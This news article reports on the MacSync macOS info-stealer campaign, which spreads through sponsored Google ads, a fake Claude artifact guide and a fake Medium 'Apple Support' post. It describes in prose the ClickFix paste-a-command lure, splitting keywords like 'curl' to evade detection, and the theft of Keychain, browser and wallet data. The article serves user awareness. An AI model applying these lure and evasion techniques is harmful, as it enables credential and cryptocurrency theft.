A large-scale macOS malware campaign is spreading through sponsored Google search results and trusted online platforms. More than 15,000 users have already been exposed to the malicious content, making this one of the more concerning threats currently affecting Mac users.
The attackers are distributing a data-stealing program known as MacSync. Instead of using suspicious emails or fake downloads, the campaign relies on professional-looking guides published on legitimate platforms. The goal is simple: convince users to run harmful commands on their own computers.
Security analysts have identified two main variants of the attack. Both use social engineering tactics designed to trick users into believing they are performing safe system tasks.
Sponsored Search Results Lead to Fake macOS Security Guide
In the first variant, users searching for “Online DNS resolver” on Google are shown a sponsored advertisement at the top of the results page. The ad redirects them to a public page hosted using Claude AI’s artifact feature.
The page is titled “macOS Secure Command Execution” and appears to offer a technical guide for safely running commands. The content looks structured and professional, which increases trust.
Russian-Linked Hackers Nearly Shut Down Poland’s Power and Heating in Winter Cyber Strike
However, the guide instructs users to copy and paste a base64-encoded command into the macOS Terminal application. The instructions claim the command enhances security. In reality, it downloads a malicious file into the system’s temporary folder under the name osalogging.zip.
Once executed, the file installs a loader for MacSync malware. The malware then connects to a remote command-and-control server. It uses a hardcoded authentication token and API key while pretending to be a normal macOS browser by spoofing its user-agent string.
The server sends instructions back to the infected system. These instructions are passed directly to osascript, Apple’s scripting utility, which carries out the data theft.
MacSync searches the device for sensitive information. It targets saved passwords in the macOS Keychain, browser data, login credentials, and cryptocurrency wallet files.
The stolen data is compressed into a zip archive and uploaded using HTTP POST requests. If the file size is large, the malware divides it into smaller parts and retries failed uploads multiple times using an exponential delay system. After completing the transfer, it deletes temporary files to reduce traces of its activity.
Fake Medium Article Delivers Obfuscated ClickFix Attack
The second variant focuses on users searching for “macOS CLI disk space analyzer.” Instead of a Claude artifact, this method directs users to a fraudulent Medium article.
The article claims to be written by an official Apple Support Team. It provides instructions that appear helpful and technical, guiding users through disk space analysis commands.
This version also uses the ClickFix social engineering technique. ClickFix tricks users into manually executing commands under the belief that they are fixing or optimizing their system.
The malicious command in this variant is more heavily disguised. The attackers break up recognizable keywords to bypass basic detection tools. For example, instead of writing “curl” normally, they use a split format such as cur””l.
When executed, the command retrieves a malicious payload. The payload installs the same MacSync information stealer used in the first variant.
Like the Claude-based method, this attack hides behind a trusted platform. The layout and branding of the Medium page make the content look authentic, increasing the likelihood that users will follow the instructions without suspicion.
MacSync Malware Targets Passwords, Browsers, and Crypto Wallets
MacSync is specifically built to collect sensitive macOS data. After installation, it scans the system for stored credentials and financial information.
It extracts passwords from the Keychain, collects browser cookies and autofill data, and searches for cryptocurrency wallet files stored locally. This information can allow attackers to access accounts without immediate detection.
The malware uses secure-looking network communication methods and cleanup routines to make analysis harder. It disguises traffic as legitimate browser activity and removes temporary files once data transfer is complete.
By combining Google Ads, AI-generated artifacts, and trusted blogging platforms, the attackers have created a distribution method that appears legitimate at first glance. Sponsored search placements increase visibility, while familiar websites lower user suspicion.
European Commission delays decision on Google over advertising practices
The campaign demonstrates how malware operators are shifting tactics. Instead of relying solely on phishing emails, they are embedding malicious instructions into content that looks educational and helpful.
More than 15,000 users have already encountered the malicious pages linked to this operation. The campaign shows how easily trusted digital platforms can be misused to distribute macOS malware and steal sensitive information.
